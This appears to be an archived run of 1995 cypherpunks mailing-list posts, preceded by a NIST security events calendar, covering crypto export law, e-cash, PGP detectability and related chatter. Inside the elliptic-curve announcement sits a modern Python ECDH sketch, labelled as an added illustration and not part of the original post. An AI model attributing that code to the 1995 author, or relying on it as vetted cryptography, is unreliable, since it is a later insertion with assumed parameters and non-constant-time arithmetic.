Message-ID: <199509111339.PAA09319@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



From URL: http://csrc.ncsl.nist.gov/events/eventcal.txt


Last update: 07/24/95

                  COMPUTER SECURITY EVENTS CALENDAR

    This file contains a list of upcoming computer security events.
    The absence or inclusion of any particular event does not imply
    criticism or endorsement by the National Institute of Standards
    and Technology or the sysop.  Because of the nature of this
    material and how it is obtained, it is impossible to include
    every event.  If you know of computer security events that are
    not listed, please send the conference/course literature and
    requests to the following:

           Computer Security Resource Clearinghouse (Events Calendar)
           National Institute of Standards and Technology
           Room A-216, Bldg. 225
           Gaithersburg, MD 20899
           webmaster@csrc.ncsl.nist.gov


[Snip sessions before 9/7]


DATE:      09/07/95
TITLE:     Information Warfare Conference (InfoWarCon) '95
LOCATION:  Arlington, VA
SPONSOR:   National Computer Security Association (NCSA)
CONTACT:   National Computer Security Association
ADDRESS:   10 S. Courthouse Ave.
CITY_ST:   Carlisle, PA 17013
PHONE:     (717) 258-1816


DATE:      09/11/95
TITLE:     ASIS 41st Annual Seminar & Exhibits
LOCATION:  New Orleans, LA
SPONSOR:   American Society for Industrial Security (ASIS)
CONTACT:   Society for Industrial Security
ADDRESS:   1655 North Fort Myer Dr., Suite 1200
CITY_ST:   Arlington, VA 22209
PHONE:     (703) 522-5800


DATE:      09/11/95 - 09/13/95
TITLE:     Exploring the Hostile Cyberspace
LOCATION:  Cleveland, OH
SPONSOR:   NASA Lewis Research Center, et al.
CONTACT:   New Dimensions International
ADDRESS:   P. O. Box 897
CITY_ST:   Cardiff, CA 92007
PHONE:     (619) 436-5618


DATE:      09/12/95
TITLE:     COSAC '95
LOCATION:  Dublin, Ireland
SPONSOR:   Republic of Ireland AKA Associates
CONTACT:   AKA Associates
ADDRESS:   7 Darragh Road
CITY_ST:   Crossgar, Co. Down, BT30 9NP
E-MAIL:    cosac95@ibm.net


DATE:      09/14/95
TITLE:     Network Security (LAN's Client/Server and the Internet)
LOCATION:  St. Louis, MO (other dates and locations available, call CSI)
SPONSOR:   CSI (Computer Security Institute)
CONTACT:   CSI
ADDRESS:   600 Harrison Street
CITY_ST:   San Francisco, CA 94107
PHONE:     (415) 905-2626


DATE:      09/17/95
TITLE:     LISA 9th Systems Administration Conference
LOCATION:  Monterey California
SPONSOR:   USENIX, ACSTPA, SAGE
CONTACT:   USENIX Conference Office
ADDRESS:   22672 Lambert Street, Suite 613
CITY_ST:   Lake Forest, CA 92630
PHONE:     (714) 588-8649


DATE:      09/18/95
TITLE:     7th Computer Security Incident Handling Workshop
LOCATION:  Karlsruhe, Germany
SPONSOR:
CONTACT:   Rechenzentrum Uni Karlsruhe, Herr Fischer
ADDRESS:   Zirkel 2
CITY_ST:   D-76131 Karlsruhe, Germany
PHONE:     +49 721 376422


DATE:      9/20/95
TITLE:     Acquisition Streamlining and Information Warfare
LOCATION:  Koran Room, Ft. Myer Officers Club in Arlington, VA
SPONSOR:
CONTACT:
ADDRESS:
CITY_ST:   Arlington, VA
PRESENTER: Anthony Valletta, Deputy Assistant Secretary of Defense, C3I - Acquisitions
PHONE:     (202) 828-1920 for info or reservations


DATE:      10/10/95
TITLE:     18th National Information Systems Security Conference
LOCATION:  Baltimore, MD
SPONSOR:   NSA/NCSC and NIST/CSL
CONTACT:   Tammie Grice
ADDRESS:   NIST, Room A807, Bldg 101
CITY_ST:   Gaithersburg, MD 20899
PHONE:     (301) 975-3883


DATE:      10/19-20/95
LOCATION:  Bethesda, MD
SPONSOR:   ABA, NIST, USCIB, ...
CONTACT:   Worldwide Electronic Commerce Conference '95
ADDRESS:   PO Box 743485
CITY_ST:   Dallas, TX  75374
PHONE:     214.516.4900
EMAIL:     wec@multicorp.com
URL:       http://www.multicorp.com/wec


DATE:      10/24/95
TITLE:     The Business Recover Managers Symposium
LOCATION:  San Diego, CA
SPONSOR:   MIS Training Institute
CONTACT:
ADDRESS:   498 Concord Street
CITY_ST:   Framingham, MA 01701-2357
PHONE:     (508) 879-7999


DATE:      11/06/95
TITLE:     CSI's 22nd Annual Computer Security Conference
LOCATION:  Washington, D.C.
SPONSOR:   Computer Security Institute
CONTACT:   Computer Security Institute
ADDRESS:   600 Harrison St.
CITY_ST:   San Francisco, CA 94107
PHONE:     (415) 905-2626


DATE:      12/11/95
TITLE:     11th Annual Computer Security Applications Conference
LOCATION:  New Orleans, LA
SPONSOR:   Applied Computer Security Associates
CONTACT:   Ann Marmor-Squires
ADDRESS:   TRW Systems Division
CITY_ST:   Fairfax, VA 22033
PHONE:     (703) 803-5503


DATE:      05/15/97
TITLE:     Security and Audit Oracle
LOCATION:  Washington, D.C.
SPONSOR:   MIS & Dept. of Justice
CONTACT:   Pat Ciuffreda
ADDRESS:   CTTS/IRM/JMD, Room 1211-ARB
CITY_ST:   Washington, DC 20530
PHONE:     (202) 616-2018







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Mon, 11 Sep 95 06:18:28 PDT
To: karlmarx@ix.netcom.com
Subject: Re: Voice Encryption
In-Reply-To: <199509110742.AAA17689@ix5.ix.netcom.com>
Message-ID: <199509111315.QAA27696@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> A friend of mine recently told me that Phil Zimmerman was distributing
> a voice encryption program over the 'net. I dismissed his comment
> thinking he was probably

There are several packages referenced in the software section of
http://www.cs.hut.fi/crypto.  It also contains links to ftp sites
outside the United States.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Ackman <tka@brutus.bright.net>
Date: Mon, 11 Sep 95 14:13:08 PDT
To: cypherpunks@toad.com
Subject: itar question
Message-ID: <Pine.SUN.3.91.950911170252.25910A-100000@brutus.bright.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi. 

please excuse if this is an inappropriate place to ask this, but what the 
hell...

If I create a set of patches to a PD or GNU software package (i.e. telnetd, 
httpd) to support encryption (in particular SSL), can i put the patches up 
on an ftp site, Or would i be in violation of itar, and therefore risk 
getting hauled off by the feds?  (i'm a us citizen living/working in the 
states).

Thanks.
-TA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 11 Sep 95 18:07:21 PDT
To: pfarrell@netcom.com
Subject: Re: Media coverage of NIST Export meetings?
In-Reply-To: <32173.pfarrell@netcom.com>
Message-ID: <199509120107.SAA03422@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Has anyone seen any media coverage of last week's meetings?
| I haven't seen anything in either the Washington Post or
| the Wall Street Journal. Nothing on radio or local TV either.
| 
| I don't expect much coverage, as Joe Sixpack has no knowledge of
| why he should be interested. But I expected at least a paragraph
| hidden somewhere inside.  Perhaps I missed it.
| 
| Anyone else seen any???

I'm just in the process of sending off the abstract you did plus
the pointers to a number of journalists I know. But that's in Sweden,
so I guess it doesn't count. :-)

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@land.cs.Colorado.EDU>
Date: Mon, 11 Sep 95 18:49:24 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Brand e-cash implementation?
In-Reply-To: <Pine.PMDF.3.91.950910012952.541131339B-100000@umiami.ir.miami.edu>
Message-ID: <199509120148.TAA03019@land.cs.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:
>
> Have there been any implementations, even as trials, of Brands' protocols?
> Do any ecash systems on the drawing board even include real user anonymity?


Could someone point me to Brand's electronic money protocol?  I have heard of
it and would like to learn more.  If it is a discussable topic then please
someone try to convince me that it is better than Chaum's or
Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money
Protocol Which Has Official Cypherpunk Blessing.


(Hopefully a discussion will ensue and rescue this article from that room in
Data Hell where posts that ask for help but contribute nothing are sent...)


Bryce
signatures follow:


(new .sig with URL coming soon!  Stay tuned for more exciting adventures...)
                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Bryce's Auto-PGP v1.0beta3

iQCVAwUBMFTm5fWZSllhfG25AQHpOQP+MXO8vsxuFnQfaH5cE1t75jihM+m4RsRx
vaSHwYZJORdEqdZ4qhLj1WaLqRra+GiSbCiEy2i2kbA5ATyc+1huXCKoIsgF4Rp+
NUBlSG3X1N2iFq2DTvboCanajq0MMcLp1LOlzLPvjoEDuxnZhvSlk2LN6fg9ds3w
M4DflyKOmwo=
=DqDg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 11 Sep 95 21:54:01 PDT
To: cypherpunks@toad.com
Subject: Re: Brand e-cash implementation?
Message-ID: <199509120452.VAA14913@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Bryce Wilcox <wilcoxb@land.cs.Colorado.EDU>
> Could someone point me to Brand's electronic money protocol?  I have heard of
> it and would like to learn more.  If it is a discussable topic then please
> someone try to convince me that it is better than Chaum's or
> Chaum's-plus-anonymity-both-ways, or some other candidate for E-Money
> Protocol Which Has Official Cypherpunk Blessing.

<URL:http://ganges.cs.tcd.ie/mepeirce/Project/Mlists/brands.html> has a
good collection of earlier discussions on Brands' cash, as well as
pointers to Brands' work itself.

Brands' home page, <URL:http://www.cwi.nl/~brands> has a long list of
advantages which his system has over Chaum's original cash proposals,
mostly technical in terms of efficiency and provability.

Brands' and Chaum's systems have similar anonymity properties so I don't
see much to choose between them on political grounds.  Brands tends to
work in the context of off-line systems with "observer" chips which
prevent double spending.  But his protocols can be used in other payment
environments as well.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 11 Sep 95 18:53:22 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: crypto confrontation
In-Reply-To: <199509112036.NAA10670@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.950911214954.6546B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Sep 1995, Vladimir Z. Nuri wrote:

> picketers in front of buildings clashing with police is almost 
> guaranteed to get a little media coverage, almost no matter what
> the issue.

I was really considering dropping by the meeting myself, and laying down 
the line in a very resistant manner, but as usual too much research popped 
up at the wrong time!  Imagine having a copy of PGP in a DHL package 
addressed to a cypherpunk in Europe, holding it up and going "I'm mailing 
this tomorrow.  Try putting me in jail!"

-Thomas







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rosing <cryptech@Mars.mcs.com>
Date: Mon, 11 Sep 95 21:14:45 PDT
To: cypherpunks@toad.com
Subject: Elliptic Curve Public Key Crypto available
Message-ID: <Pine.3.89.9509112204.A25037-0100000@Mars.mcs.com>
MIME-Version: 1.0
Content-Type: text/plain


in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii files.  
One contains code and the other contains documentation: eliptic.src and 
elliptic.doc.  The code portion is a cat'ed block of files: headers,
C sources and a set of prime numbers.  The documentation attempts to
explain the math, but it does help if you already know number theory.  It 
hopefully isn't necessary.

The code is a specific implementation of one particular type of math.  
It violates no known patents.  It appears to work.  The academics claim 
that elliptic curves over Galois Fields are really secure.  Preliminary 
testing bears this out, changing one bit of input gives uniformly 
distributed "random" output.

Previous to the availability of 100 MHz processors this method of public 
key crypto was ridiculously slow.  The only versions were laboratory 
curiosities implemented in ASIC hardware.  Code, if it exists, is not in 
the public domain.

The code is based on several papers (some 15 references are listed in the 
doc file, 6 are more directly important) and a couple of books.  It 
includes optimal normal basis math, elliptic curve math, and public key 
secret sharing.  With 128 bit symmetric encryption, a 226 bit field is 
more than sufficient to hide it.

I believe it is really strong crypto.  I did not invent anything.  I just 
implemented a few textbook examples that nobody else has.  Since it's 
from public domain sources, and it's now public domain software, it can 
be freely used.  You get what you pay for.  

Code is a living thing.  It takes lots of people lots of time to make any 
code useful.  The purpose of this code is to show that there is more than 
one way to create public key cryptosystems and to bring academic 
discussion into the everyday realm of real world problems.  I suggest you 
get a copy to work with before it becomes illegal ;-)

Patience, persistence, truth,
Dr. mike
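
[Added illustration, not part of the original post and not Dr. Rosing's
code: a compact sketch of elliptic curve math over a Galois field GF(2^m),
public-key secret sharing (Diffie-Hellman), and the one-bit-change test the
post mentions. Assumptions: a polynomial basis with x^233 + x^74 + 1 stands
in for the post's optimal normal basis over a 226-bit field, the curve is
y^2 + xy = x^3 + 1, the base point is found by search, and all function
names and scalars are constructed for this example.]

```python
# Added illustration: EC Diffie-Hellman over GF(2^233), polynomial basis.
M = 233
POLY = (1 << 233) | (1 << 74) | 1   # assumed reduction polynomial x^233 + x^74 + 1
A, B = 0, 1                         # assumed curve: y^2 + x*y = x^3 + A*x^2 + B
INF = None                          # point at infinity

def gf_mul(a, b):
    """Multiply two reduced field elements (shift-and-add, reducing as we go)."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        b >>= 1
        a <<= 1
        if a >> M:
            a ^= POLY
    return r

def gf_inv(a):
    """Inverse via the binary extended Euclidean algorithm over GF(2)[x]."""
    if a == 0:
        raise ZeroDivisionError("zero has no inverse")
    u, v, g1, g2 = a, POLY, 1, 0
    while u != 1:
        j = u.bit_length() - v.bit_length()
        if j < 0:
            u, v, g1, g2, j = v, u, g2, g1, -j
        u ^= v << j
        g1 ^= g2 << j
    return g1

def on_curve(P):
    if P is INF:
        return True
    x, y = P
    x2 = gf_mul(x, x)
    return gf_mul(y, y) ^ gf_mul(x, y) == gf_mul(x2, x) ^ gf_mul(A, x2) ^ B

def add(P, Q):
    """Affine group law for a non-supersingular curve in characteristic 2."""
    if P is INF:
        return Q
    if Q is INF:
        return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2:
        if y1 != y2 or x1 == 0:          # Q == -P, or P is its own inverse
            return INF
        lam = x1 ^ gf_mul(y1, gf_inv(x1))
        x3 = gf_mul(lam, lam) ^ lam ^ A
        y3 = gf_mul(x1, x1) ^ gf_mul(lam ^ 1, x3)
    else:
        lam = gf_mul(y1 ^ y2, gf_inv(x1 ^ x2))
        x3 = gf_mul(lam, lam) ^ lam ^ x1 ^ x2 ^ A
        y3 = gf_mul(lam, x1 ^ x3) ^ x3 ^ y1
    return (x3, y3)

def mul(k, P):
    """Double-and-add; not constant time, so for illustration only."""
    R = INF
    while k:
        if k & 1:
            R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R

def half_trace(c):
    """For odd M, z = half_trace(c) solves z^2 + z = c whenever Tr(c) = 0."""
    t = c
    for _ in range((M - 1) // 2):
        t = gf_mul(t, t)
        t = gf_mul(t, t) ^ c
    return t

def find_base_point():
    """Search for a curve point, then multiply by 4 (this curve's cofactor)."""
    x = 2
    while True:
        c = x ^ A ^ gf_mul(B, gf_inv(gf_mul(x, x)))   # c = x + A + B/x^2
        z = half_trace(c)
        if gf_mul(z, z) ^ z == c:                      # solvable: y = x*z
            G = mul(4, (x, gf_mul(x, z)))
            if G is not INF:
                return G
        x += 1

def shared_secret(priv, peer_pub):
    """x-coordinate of priv * peer_pub, after validating the peer's point."""
    if peer_pub is INF or not on_curve(peer_pub):
        raise ValueError("peer public key is not a valid curve point")
    S = mul(priv, peer_pub)
    if S is INF:
        raise ValueError("degenerate shared point")
    return S[0]

def bit_flip_distance(G, k, bit):
    """Hamming distance between x(k*G) and x(k'*G), k' = k with one bit flipped."""
    return bin(mul(k, G)[0] ^ mul(k ^ (1 << bit), G)[0]).count("1")
```

[Both parties compute mul(own_private, G) as a public key and call
shared_secret() on the other's; bit_flip_distance() should land near half
of the 233 output bits.]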





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 11 Sep 95 23:08:55 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Digital Fingerprinting
In-Reply-To: <Pine.SUN.3.91.950911054528.26534B-100000@panix.com>
Message-ID: <Pine.D-G.3.91.950911225223.104A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Sep 1995, Duncan Frissell wrote:

> 
> On Sun, 10 Sep 1995, Timothy C. May wrote:
> 
> > If a piece of mail addressed to me is found littering the highway, can I be
> > convicted of littering? No, because the _provenance_ of that item of mail
> > cannot be determined...it might have accidentally blown out of a trash
> > truck delivering my mail to the dump, for example.
> 
> I'm afraid that they are busting people in New York for recycling 
> violations when they find mail addressed to them mixed in with household 
> garbage in public trash cans.

Finding the mail mixed in there is evidence that supports the "charge" 
but surely can be rebutted.  When I was practicing in a small town c. 
1984, people would be summoned (sent a paper telling them to show up) to 
court for illegal dumping if their mail was found with other trash, old 
refrigerators, etc., in a creek somewhere.  Those charged could always 
put on proof that Billy Bob's garbage service picked up their trash ...

The sentence was almost always to go and pick up some multiple of the 
garbage found and take it to the landfill.

No one was ever "busted" in the way I think of it -- arrested.

I guess NY doesn't have as much serious crime as I thought!

EBD



 
> DCF
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Mon, 11 Sep 95 22:32:37 PDT
To: cypherpunks@toad.com
Subject: away from my mail
Message-ID: <199509120534.XAA01019@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


I will not be reading my mail for a while.
Your mail concerning "Re: CFV: rec.knives"
will be read when I'm back.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Mon, 11 Sep 95 22:48:11 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: spam apology
Message-ID: <Pine.LNX.3.91.950911234902.268B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


cpunks,

sorry for my recent spam of the list due to my inept testing of how procmail 
interacts with the vacation program.

-pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Mon, 11 Sep 95 23:22:44 PDT
To: cypherpunks@toad.com
Subject: Re: spam apology
Message-ID: <199509120622.XAA05153@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>cpunks,
>
>sorry for my recent spam 

Look, the SPAM was hot, and there wasn't too
much VELVEETA added other than the mail.cyperpunks
category, so it tasted fairly good. It hadn't passed
the expiration date, so all is forgiven.

Love Always,

Carol Anne
ps Has anyone ever heard of alt.skullfuck.charles-eicher?
   Even Gloria Segal doesn't reap that much hatred.
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 12 Sep 95 01:36:36 PDT
To: cypherpunks@toad.com
Subject: Re: anyone got a cpunk URL for the UK munitions T?
Message-ID: <ac7af7da0e0210047b0d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


My homepage has not got that many links, but it is fairly well known.
I would be happy to set up a WWW page just for you. How about:
http://obscura.com/~t-shirt/

This will be around for quite a while, since I am getting into the ISP biz, and
obscura is my domain.

At 1:05 AM 9/12/95, aba@atlas.ex.ac.uk wrote:
>On the subject of the UK printing of the munitions T-shirt, I've got a
>problem, I would like to put a URL for how to obtain the T-shirts, and
>cypherpunk political material, anti ITAR, clipper etc, but yet I can't
>very well put my URL:
>
>        http://www.dcs.ex.ac.uk/~aba/rsa/
>
>because that may possibly move within a year, maybe sooner, and
>T-shirts are so permanent :-(
>
>It seems like too good an opportunity to miss, as some people may get
>the thing nice publicity, and interest in the cypherpunks take on
>encryption, so it would be ideal to have an on-line reference on the
>shirt.
>
>So what I was thinking is it would be nice if someone with a permanent
>URL, could put a pointer to my URL, that could be updated later, as my
>URL moves?
>
>A cypherpunks page which has been and will be around for a *long time*
>with lots of info or pointers to info on ITAR, the evils of key escrow
>etc would be ideal.
>
>I don't need the WWW space for the actual info as such, just a pointer
>which can point to where-ever it is my URL moves to, and as most
>cpunks URLs seem to be in the US, it wouldn't be a v good idea to put
>my content on a US server anyway (arguably).
>
>Any offers?
>
>Also now I'm here, there were a few people on the list who ordered
>shirts from me, and the progress has been slow, if you want to see the
>reasons, and up-to-date state of progress, take a look at:
>
>        http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
>
>I need to decide soon as to what URL to print, I was otherwise
>thinking of removing the URL, as my sys admin made some strange
>cryptic comment about me not having my URL after a while anyway (when
>I finish the course, pointed comment? who knows), and I thought it
>might not go down too well if I printed my URL on the T-shirt, at least
>if it's an indirect pointer I have the option to get alternate WWW
>space.
>
>I have decided to switch printers as the last guy seems to have
>vanished, no answers to messages on answer phone for > 1 week, and
>some shirt printers (like the new one I've chosen) offer to do the whole
>job in a week, and people are getting impatient for their shirts.  So
>I ideally need a commitment of a URL so that I can modify the design &
>send off to this new printers tonight.
>
>The main criteria, apart from a nice selection of links (I've got ITAR
>and cpunk links already anyway) is that the URL pointing at my roving
>URL is going to stay there for a few years, at least.
>
>Adam

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 12 Sep 95 00:19:32 PDT
To: cypherpunks@toad.com
Subject: PGP in UK - snooped as unSTEALTHed?
Message-ID: <199509121021.FAA22455@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


>Received: by toad.com id AA16930; Sun, 10 Sep 95 02:10:05 PDT
>From: anonymous-remailer@shell.portal.com
>Subject: PGP in UK

>-----BEGIN PGP SIGNED MESSAGE-----

>I heard something rather disturbing the other day from someone I do
>business with.  I've been telling this company for 18 months or so
>about the advantages of PGP and email rather than faxes, and they
>finally tried it, liked it, and decided to use it a month or so ago.
>Last week they got a visit from the Department of Trade of Industry
>and MI5 (or is it MI6?) telling them to stop using PGP or they might
>find difficulties getting export licences for their products in
>future.  The visitors wouldn't say how they knew this company had
>been using it.

                    PGP IS MARKED!

   Well, I just used MIT's PGP 2.6.2 with 3 different users' public
keys to encrypt 3 different files. In all 3 files, the first 3
characters were the same (an umlauted A, then an i with an up arrow
over it, and then a heart). This beginning 3 character string is
apparently the infamous PGP RSA signature. The signature that says
to spooks' programmed encryption sniffers - "HEY! I'M PGP -  GIVE ME
A LOOK!."

   When are the PGP designers and coders going to get serious and
develop STEALTH PGP inside PGP itself!? I think that it would take the
states at least many thousands of times the computing cycles to spot
PGP encrypted files without the RSA signature. - IF it were practical to
look for STEALTH PGP at all when snooping communications networks.

  So what, -that "only a few companies" will be discovered to be using PGP
through the RSA signature!? Those few companies are the seeds for the
vast numbers of companies that would follow them in using PGP over the
Internet. The RSA signature is the flag that allows the spooks to easily
net the bold first companies. The RSA signature is greatly impeding the
spread of PGP use over the Internet. PGP MUST BE STEALTHED!!

             ENCRYPTION METHODS' "RANDOM" SIGNATURE

   PGP files are, of course, compressed to remove redundancy and thus make
the method stronger. This, along with the algorithm, produces a "random"
bit file. I believe that most files on the Internet are not compressed
and thus would show order on statistical sniffing programs. Of the files
that are compressed, by PKZIP for example, I believe they would probably
have a compression string signature particular to that compression
method. Otherwise, compressed files show more randomness. I don't know if
compressed programs show an order throughout the file. If they do, then,
possibly, PGP could have a function added to it to duplicate this order.

   This suggests that PGP should also have a function that makes a phoney
compression method signature. This would allow PGP'ed files to hide
among compressed files on the Net.

                   -----------

   With the removal of the PGP RSA signature and the addition of phony
compression signatures, PGP'ed files would travel the Net without draw-
ing attention to themselves. This would greatly facilitate the growth
of PGP traffic by organizations.


         MICROSOFT VERSUS BORLAND FOR COMPILING/ASSEMBLING PGP

   Oftentimes, Borland C and Assembler can be bought at prices that
are a fraction of the price of Microsoft C and Assembler. This suggests
that PGP should be programmed with Borland instead of with Microsoft. I
think that this would be a step in making PGP a real peoples' encryption
method. It is more practical for people to get Borland programming soft-
ware than Microsoft programming software. This change from Microsoft to
Borland might encourage a lot of experimentation and innovation by a lot
of individual and small group programmers.


>The person who told me about this also said something about a
>Department of Trade & Industry paper which mentioned that the British
>Government was going to insist on key escrow for encryption.  I had
>hoped to get a copy of this, but he can't find it at the moment.
>I'll post the text when I get it if anyone's interested.

>Anyone else in the UK heard anything about this?

>- -- B.

>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.i

>-----END PGP SIGNATURE-----


>-----BEGIN PGP PUBLIC KEY BLOCK-----
>Version: 2.6.i

>-----END PGP PUBLIC KEY BLOCK-----



THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 12 Sep 95 03:46:13 PDT
To: cypherpunks@toad.com
Subject: Questions on PGP3.0
Message-ID: <199509121046.EAA00209@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ok, any of you who are involved in PGP 3.0, please fess up. I know that
                                            ^^^^^^^^^^^^^^
it's not even into the RealSoonNow(tm) stages, so I have some questions
about features, like are they being addressed/considered/rejected:

1) Extracting & using the IDEA keys
2) Old ID strings retained for signatures, but maybe less obvious
3) Ignoring new ID strings not signed with the key
4) Some kind of This Key will self-destruct in 1 year type of thing
   so we don't someday have 5 meg keyfiles of revoked keys. Also
   attempts at dating the signatures on the assumption of honesty
5) Automagically linked keys for secure/nonsecure work
6) Built in rant-detector/filter
7) Add-an-ad, for example "This PGP msg brought to you by Coke!"
   to help the PGP project gain commercial support.
8) maybe a non-propagation signature, or something to keep joe sixpack
   from signing a key he just wants to trust (but not declare that trust), 
   because the sig somehow seems to end up up on a keyserver.
9) Grab-for-the-throat replacement of some of the add-in tools. For
   example, giving PGP some option so that it comes up with a menu, with
   one of the options being to invoke the editor that some other program
   thought it was invoking when it ran PGP.
10) Being able to bypass things like This key not fully certified do you
   want to certify it yourself (y/N).

Just some thoughts, not a wish list or anything. Umm, well that #6 maybe...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFVkycLa+QKZS485AQFLqgL/dvaEnZavsAOiT8eNKJhRLh+Izlxx2QmF
sXj+Ps7O+xughkGz+OankAsqhON/iHeWczEVHGa5grIJ1WDlX77lqdANtHjpf2tI
QXMD7iLB3gdX4Gy8X2OaQifp2QS8IN4l
=gXJQ
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 03:25:04 PDT
To: A5113643667@attpls.net (Tom Jones)
Subject: Re: draft key mgmt props
In-Reply-To: <3E79EDD0>
Message-ID: <199509121024.GAA15929@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Jones writes:
> Does anyone here feel like explaining the situation between the three
> key management proposals now at the internet draft stage?

Which ones are you referring to?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Sep 95 03:29:50 PDT
To: gjeffers@socketis.net (Gary Jeffers)
Subject: Re: PGP in UK - snooped as unSTEALTHed?
In-Reply-To: <199509121021.FAA22455@mail.socketis.net>
Message-ID: <199509121029.GAA15937@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary Jeffers writes:
>    Well, I just used MIT's PGP 2.6.2 with 3 different users' public
> keys to encrypt 3 different files. In all 3 files, the first 3
> characters were the same (an umlauted A, then an i with an up arrow
> over it, and then a heart). This beginning 3 character string is
> apparently the infamous PGP RSA signature. The signature that says
